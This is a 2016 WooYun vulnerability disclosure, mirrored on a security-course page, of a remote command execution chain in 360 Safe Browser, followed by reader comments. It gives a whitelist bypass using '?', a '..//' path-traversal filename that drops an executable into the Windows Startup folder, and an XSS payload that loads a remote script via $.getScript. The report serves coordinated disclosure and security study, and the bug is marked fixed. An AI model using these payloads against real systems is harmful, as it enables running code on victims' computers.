破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

360安全浏览器远程命令执行漏洞接力赛第四棒

编号178241
Urlhttp://www.wooyun.org/bug.php?action=view&id=178241
漏洞状态厂商已经修复
漏洞标题360安全浏览器远程命令执行漏洞接力赛第四棒
漏洞类型远程代码执行
厂商奇虎360
白帽子唐朝实验室
提交日期2016-02-24 12:23:00
公开日期2016-05-28 16:30:00
修复时间2016-05-28 16:30:00
确认时间2016-02-28 00:00:00
Confirm Spend4
漏洞标签远程代码执行 客户端安全 浏览器漏洞利用技巧
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank20
漏洞简介
这只是对『心伤的胖子』接力的回应。仍旧是技术分享,其他的留给评论。
浏览器版本:8.1.1.131
漏洞细节

是的,这是对之前漏洞的 http://**.**.**.**/bugs/wooyun-2010-0170984 绕过,之前漏洞有两个关键点:
1. 利用 / 符号绕过了 360 白名单的限制;
2. 利用 ../ 跳转把恶意文件放置到当前用户的启动目录;
360 在随后的版本中做了修复,所以在最新的 **.**.**.** 版本中漏洞肯定是不存在的。
经过测试,发现 360 修复的方案为:
1. 不允许域名中出现 / 符号,但是还是会允许别的特殊符号;
2. 通过 ../ 无法跳转目录放置恶意程序到指定目录;
具体怎么绕过?下面就是见证奇迹的时刻:
和 / 有异曲同工的符号是 ?,所以我们的插件链接是:

**.**.**.**?.**.**.**.**/poc.zip


会被浏览器识别为:

**.**.**.**/?.**.**.**.**/poc.zip


这样我们绕过第一个条件的限制,成功让浏览器下载我们指定的插件。
虽然新版本中浏览器限制通过 ../ 跳转到指定目录,但是经过测试发现却可以使用 ..// 来跳转到指定目录,是不是很神奇?所以我们 poc.zip 文件中只需要包含文件名为如下的文件即可在安装插件的同时把我们的文件放置到当前用户的启动目录

//..//..//..//..//..//Microsoft//Windows//Start Menu//Programs//Startup//funny.exe


btw:这个地方的逻辑我真是没懂。
这两个关键的点已经解决了,还有一些小的问题困扰着我们
1. 新版本浏览器修复了任意域名下都能够调用 external api 的漏洞
2. 只允许部分 **.**.**.** 的域名才能够调用 external api
也就是我们必须找一个允许调用 external api 的 **.**.**.** 域下的 XSS 漏洞,其实我们有一个:

http://m.cp.**.**.**.**/kaijiang/tdetail/?lotid=220051&issue=<script>alert(1);</script>


但是 m.cp.**.**.**.** 域并没有调用 external api 的权限,但是 cp.**.**.**.** 域名却有权限,所以我们可以这样:
1. 用 m.cp.**.**.**.** 域下的 XSS 执行 JS 代码,做两件事情:设置 document.domain 为:**.**.**.**,然后创建一个 iframe,加载一个同样设置 document.domain 为 **.**.**.** 的 cp.**.**.**.** 的页面;
2. 然后跨域在 cp.**.**.**.** 域名下执行 JS 代码,通过上面的漏洞达到远程命令执行的效果;
幸运的是我们在 cp.**.**.**.** 域名下找到一个 document.domain 设置为 **.**.**.** 的页面:

http://cp.**.**.**.**/help/hemai.html


所以我们的代码是:

http://m.cp.**.**.**.**/kaijiang/tdetail/?lotid=220051&issue=<img%20src%3Da%20onerror%3D$.getScript("**.**.**.**/poc.js")> 
poc.js 见测试代码


POC

视频:http://**.**.**.**/wooyun/upload/201602/360_security_browser_rce_3.mov

修复方案

1. 检测 ? 符号;
2. ..// 的逻辑也需要做下处理;

状态信息 2016-02-24: 细节已通知厂商并且等待厂商处理中
2016-02-28: 厂商已经确认,细节仅向厂商公开
2016-04-23: 细节向核心白帽子及相关领域专家公开
2016-05-03: 细节向普通白帽子公开
2016-05-13: 细节向实习白帽子公开
2016-05-28: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复感谢白帽子提交的报告,我们第一时间通知业务部门修复了该问题并发布了新版本全网推送升级。
回应信息危害等级:高漏洞Rank:20 确认时间:2016-02-28 16:28
Showing 1-35 of 35 items.
评论内容评论人点赞数评论时间

MB用他的浏览器,今天被XSS了

白骨夫人02016-03-01 20:19:00

连续剧真好看

围剿02016-02-25 10:04:00

hate 360

白骨夫人02016-02-24 22:19:00

支持技术分享!

hkcs02016-02-24 21:33:00

后排

Mark0smith02016-02-24 19:13:00

关注

SH0X800102016-02-24 18:03:00

赞啊楼上的几位都歪楼了,多从技术角度出发啊,还冤冤相报……

心伤的胖子02016-02-24 17:44:00

冤冤相报何时了

木易02016-02-24 17:20:00

牛逼 屌 围观 出售花生瓜子矿泉水 360与乌云大战

玄道02016-02-24 17:14:00

会不会有第五棒?

我是壮丁02016-02-24 17:01:00

牛逼啊

库日天02016-02-24 16:57:00

mark

秦风02016-02-24 16:53:00

关注 厉害了!

Can02016-02-24 16:34:00

旷日持久!

llkoio02016-02-24 16:20:00

哦?

大师兄02016-02-24 16:09:00

又一波互掐?

Gabriel02016-02-24 16:01:00

看连续剧

举起手来02016-02-24 16:01:00

360敢说自己是做安全的吗

大亮02016-02-24 15:55:00

围观一波

depycode02016-02-24 15:48:00

前排留名。

围观群众02016-02-24 15:24:00

DDOS大战,又准备开始了

姬野02016-02-24 15:13:00

有没有第五棒

欧冠狂魔阿森纳02016-02-24 14:05:00

前排支持技术分享!

佳佳佳佳佳02016-02-24 14:05:00

马克一下。。

j14n02016-02-24 13:48:00

感谢乌云继续较真帮助360修复更多漏洞 :)

Mixes02016-02-24 13:38:00

所谓的“安全浏览器”。

坏男孩-A_A02016-02-24 13:36:00

所谓的“安全浏览器”。

fuckadmin02016-02-24 13:08:00

360哭晕在厕所

answer02016-02-24 12:38:00

较真起来容易吓到人

猪猪侠02016-02-24 12:35:00

前排~

Agony02016-02-24 12:34:00

开门,洞主

Mieless02016-02-24 12:28:00

我靠 技术员不给力啊

诚殷的小白帽02016-02-24 12:28:00

前排支持技术分享!

田老板02016-02-24 12:25:00

前排支持技术分享!

紫霞仙子02016-02-24 12:23:00

前排~

荒废的腰子02016-02-24 12:23:00